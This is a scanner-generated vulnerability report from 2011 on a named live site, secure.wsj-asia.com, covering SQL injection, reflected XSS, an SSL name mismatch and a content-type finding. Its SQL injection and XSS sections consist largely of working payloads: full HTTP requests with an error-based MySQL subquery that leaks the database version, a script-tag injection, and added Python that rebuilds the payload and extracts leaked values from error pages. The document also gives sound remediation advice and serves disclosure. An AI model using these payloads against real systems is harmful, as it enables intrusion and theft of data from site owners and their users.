XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, secure.wsj-asia.com

Report generated by XSS.CX at Thu Oct 06 14:51:12 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. SQL injection

2. Cross-site scripting (reflected)

3. SQL statement in request parameter

4. SSL certificate

5. Content type incorrectly stated

1. SQL injection

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Issue detail

The source parameter is vulnerable to SQL injection and the database is MySQL: the error text names the MySQL server, and the leaked @@version string in Response 2 is 5.0.77. Both requests below append to the parameter value a MySQL arithmetic expression (%2B is +) that contains an error-based subquery. Request 1 ends the value with two single quotes (+''), which leaves the application's own closing quote unbalanced, so the server returns a MySQL syntax error that echoes the start of the statement. Request 2 ends the value with three single quotes (+'''), which balances the quoting so the injected subquery actually executes. Its GROUP BY key is concat(_!@, @@version, _!@, ':', floor(rand()*2)) over a two-row derived table; MySQL evaluates the key again when inserting into the aggregation table, so rand() can produce a key that was absent on lookup but present on insert, and the resulting "Duplicate entry" error carries the version string between the _!@ markers.

Because the verbose database error, including the full SQL statement, is written into the HTTP response body, this is error-based injection with direct data extraction, not merely a detection signal. Review the construction of this query (string concatenation into WHERE source = '...') and the error handling to confirm and fix it: parameterize the query and stop returning database errors to the client.

Request 1

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:32:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 478
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''
           GROUP BY source' at line 3<br>SQL : SELECT pac
...[SNIP]...

Request 2

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B''' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:32:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 352
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64)
...[SNIP]...
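
The two-request confirmation above, and the extraction of the leaked value from the duplicate-key error, as an added Python example that is not part of the original report or of the XSS.CX tooling. It rebuilds the payload sent in the source parameter, classifies the two response bodies printed above (embedded here as constructed sample input, truncated where the report is), and pulls the value between the _!@ markers out of the error. The fake_send stand-in that replays those two bodies is an assumption so the code runs offline.

```python
import re
from urllib.parse import urlencode

# The payload wraps the extracted value in CHAR(95),CHAR(33),CHAR(64) == "_!@"
MARKER = "_!@"


def error_based_payload(expr: str = "@@version", trailing_quotes: int = 3) -> str:
    """Rebuild the value sent in the `source` parameter above.

    The expression is evaluated inside a GROUP BY whose key is
    concat(<marker><expr><marker>, ':', floor(rand()*2)).  MySQL evaluates the
    key once to look it up in the aggregation temp table and again when it
    inserts, so rand() can yield a key that was absent on lookup but present
    on insert: a "Duplicate entry <key>" error that carries the expression's
    value.  Two trailing quotes leave the application's own closing quote
    unbalanced (syntax error, Request 1); three balance it so the subquery
    runs (Request 2).
    """
    marker_sql = "CHAR(95),CHAR(33),CHAR(64)"
    inner = (
        f"select count(*),concat(CONCAT({marker_sql},(select {expr}),{marker_sql}),"
        "0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1"
    )
    return f"'+(select 1 and row(1,1)>({inner}))+" + "'" * trailing_quotes


def query_string(payload: str) -> str:
    """URL-encode the payload as the `source` parameter (the '+' must become %2B)."""
    return urlencode({"source": payload})


DUPLICATE_RE = re.compile(r"Duplicate entry '(.*?)' for key")
SYNTAX_RE = re.compile(r"error in your SQL syntax")


def classify(body: str) -> str:
    """'executed' if the subquery ran, 'syntax_error' if the quoting broke
    the statement, 'silent' if no database error was echoed."""
    if DUPLICATE_RE.search(body):
        return "executed"
    if SYNTAX_RE.search(body):
        return "syntax_error"
    return "silent"


def leaked_value(body: str):
    """Pull the value between the two markers out of the duplicate-key error."""
    m = DUPLICATE_RE.search(body)
    if not m:
        return None
    key = m.group(1)  # e.g. "_!@5.0.77_!@:1"
    start = key.find(MARKER)
    end = key.find(MARKER, start + len(MARKER)) if start >= 0 else -1
    if start < 0 or end < 0:
        return None
    return key[start + len(MARKER):end]


# Response bodies as printed in the report (constructed sample input, truncated
# where the report is).
RESPONSE_1 = ("<b>Error : You have an error in your SQL syntax; check the manual that "
              "corresponds to your MySQL server version for the right syntax to use near ''''\n"
              "           GROUP BY source' at line 3<br>SQL : SELECT pac")
RESPONSE_2 = ("<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package\n"
              "           FROM sourcecode\n"
              "           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(")


def confirm(send) -> dict:
    """Two-request confirmation: `send(payload) -> body`.  Vulnerable when the
    unbalanced variant produces a syntax error and the balanced one executes."""
    unbalanced = classify(send(error_based_payload(trailing_quotes=2)))
    balanced_body = send(error_based_payload(trailing_quotes=3))
    return {
        "vulnerable": unbalanced == "syntax_error" and classify(balanced_body) == "executed",
        "version": leaked_value(balanced_body),
    }


def fake_send(payload: str) -> str:
    """Assumed stand-in for the target: replays the report's two responses."""
    return RESPONSE_2 if payload.endswith("'''") else RESPONSE_1


if __name__ == "__main__":
    print(query_string(error_based_payload()))
    print(confirm(fake_send))
```

The rand()/GROUP BY error is probabilistic, so against a live target the balanced request may need to be repeated a few times before the duplicate-key error appears; the syntax-error response is deterministic.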

2. Cross-site scripting (reflected)

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Issue detail

The value of the source request parameter is copied into the HTML document as plain text between tags: the application echoes the failed SQL statement, including the unmodified parameter value, inside a <b> element of its error page. The payload 24c14<script>alert(1)</script>99041cd2efb was appended to the SQL injection payload in the source parameter (the single quote before it keeps the statement balanced, so the subquery executed and the statement was echoed) and was returned unmodified in a response served as text/html.

This proof-of-concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection point is the verbose database error, so this issue and issue 1 share a root cause: unvalidated input is concatenated into a query and then written back into the page. A fix must parameterize the query and stop echoing the statement and raw input into error output; anything that is echoed must be HTML-encoded.

Request

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'24c14<script>alert(1)</script>99041cd2efb HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:32:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 391
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(select @@version),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'24c14<script>alert(1)</script>99041cd2efb'
           GROUP BY source</b>
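
The reflection and its fix, as an added Python example that is not part of the original report and does not reproduce the site's PHP. It models the error page shape seen in the response above (raw error and statement written into a <b> element) beside a hardened version, and applies the scanner's own criterion: the marker payload appears byte-for-byte in a body the browser will parse as HTML. The SQL and error strings are constructed from the response above, abbreviated.

```python
import html

PAYLOAD = "24c14<script>alert(1)</script>99041cd2efb"


def render_error_vulnerable(db_error: str, sql: str) -> str:
    """Shape of the error page in the response above: the failed statement,
    and with it the raw request parameter, is written straight into the HTML."""
    return f"<b>Error : {db_error}<br>SQL : {sql}</b>"


def render_error_hardened(db_error: str, sql: str, debug: bool = False) -> str:
    """Encode anything that goes into the page, and in production do not echo
    the statement or the database's message at all (log them server-side)."""
    if not debug:
        return "<b>Error : the request could not be processed.</b>"
    return f"<b>Error : {html.escape(db_error)}<br>SQL : {html.escape(sql)}</b>"


def reflected_unencoded(payload: str, body: str, content_type: str) -> bool:
    """The scanner's criterion: the marker payload appears unmodified in a
    response whose declared media type makes the browser parse it as HTML."""
    media_type = content_type.split(";")[0].strip().lower()
    return media_type == "text/html" and payload in body


# Constructed from the response above (the injected subquery is abbreviated;
# it is not needed to show the reflection).
SQL = f"SELECT package FROM sourcecode WHERE source = ''+(...)+'{PAYLOAD}' GROUP BY source"
DB_ERROR = "Duplicate entry '_!@5.0.77_!@:1' for key 1"
CONTENT_TYPE = "text/html; charset=UTF-8"


def demo() -> dict:
    vuln = render_error_vulnerable(DB_ERROR, SQL)
    safe_debug = render_error_hardened(DB_ERROR, SQL, debug=True)
    safe_prod = render_error_hardened(DB_ERROR, SQL)
    return {
        "vulnerable": reflected_unencoded(PAYLOAD, vuln, CONTENT_TYPE),
        "hardened_debug": reflected_unencoded(PAYLOAD, safe_debug, CONTENT_TYPE),
        "hardened_prod": reflected_unencoded(PAYLOAD, safe_prod, CONTENT_TYPE),
        "encoded_form": html.escape(PAYLOAD),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Encoding is the minimum; the production branch is the right default, because a debug page that prints the statement still discloses schema and query structure even when it is encoded correctly.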

3. SQL statement in request parameter

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Request

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:31:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 350
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64)
...[SNIP]...

4. SSL certificate

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.wsj-asia.com
Path:   /

Issue detail

The scanner's list of specific certificate problems was not preserved in this copy of the report. From the details below, the server certificate is issued to www.wsj-asia.com, which does not match the scanned host secure.wsj-asia.com (unless a subjectAltName entry not shown here covers it), so a client that validates the host name would reject the connection. Note also that chain #1 and chain #3 are the same VeriSign G5 CA presented twice, once cross-signed by the older Class 3 root and once self-signed. The server presented the following certificates:

Server certificate

Issued to:  www.wsj-asia.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Sun Jul 31 19:00:00 CDT 2011
Valid to:  Sun Aug 26 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036
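
The host-name check that the mismatch above fails, as an added Python example that is not part of the original report. It implements a subset of the RFC 6125 matching rules (an assumption stated in the docstring) and runs them against the scanned host and the leaf certificate's subject from the report; the SAN list and wildcard name used in the second and third cases are assumed, to show what would have made the certificate valid for this host.

```python
def _label_match(pattern_label: str, host_label: str) -> bool:
    return pattern_label == "*" or pattern_label == host_label


def name_matches(presented: str, host: str) -> bool:
    """Does one certificate name (CN or DNS SAN) cover `host`?

    Rules (a subset of RFC 6125, assumed here): comparison is case-insensitive
    on whole labels; a wildcard is allowed only as the entire left-most label,
    matches exactly one label, and the pattern must keep at least two literal
    labels (so '*.com' is rejected).
    """
    p = presented.lower().rstrip(".").split(".")
    h = host.lower().rstrip(".").split(".")
    if "*" in presented:
        if p[0] != "*" or any("*" in lab for lab in p[1:]) or len(p) < 3:
            return False
    if len(p) != len(h):
        return False
    return all(_label_match(a, b) for a, b in zip(p, h))


def check_hostname(host: str, subject_cn: str, sans=()) -> dict:
    """Mirror what a client does: DNS SANs take precedence, and the CN is
    consulted only when the certificate carries no DNS SAN (legacy fallback)."""
    names = list(sans) if sans else [subject_cn]
    matched = [n for n in names if name_matches(n, host)]
    return {"ok": bool(matched), "checked": names, "matched": matched}


# From the report: the scanned host and the leaf certificate's subject.
SCANNED_HOST = "secure.wsj-asia.com"
ISSUED_TO = "www.wsj-asia.com"


def demo() -> dict:
    return {
        "as_reported": check_hostname(SCANNED_HOST, ISSUED_TO),
        # Assumed SAN set: what would have covered both hosts.
        "with_san": check_hostname(SCANNED_HOST, ISSUED_TO,
                                   sans=["www.wsj-asia.com", "secure.wsj-asia.com"]),
        # Assumed wildcard certificate for the same zone.
        "with_wildcard": check_hostname(SCANNED_HOST, "*.wsj-asia.com"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Validity dates and chain building are separate checks; this block covers only the name match, which is the one the reported subject fails.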

5. Content type incorrectly stated

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.wsj-asia.com
Path:   /subscription/index.php

Issue detail

The response carries the header Content-Type: text/html; charset=UTF-8, stating that the body is HTML, but the scanner classified the body as XML. The body shown is a bare <b> fragment with no doctype or <html> element, which is what the heuristic reacts to; browsers will still parse it as HTML because of the declared type, which is what lets the reflected script in issue 2 execute.

Request

GET /subscription/index.php?source='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(select%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: secure.wsj-asia.com
Cookie: PHPSESSID=gthmjas6sb4g8s0hn9hsgrtp02
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 19:31:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 350
Connection: close
Content-Type: text/html; charset=UTF-8

<b>Error : Duplicate entry '_!@5.0.77_!@:1' for key 1<br>SQL : SELECT package
           FROM sourcecode
           WHERE source = ''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64)
...[SNIP]...
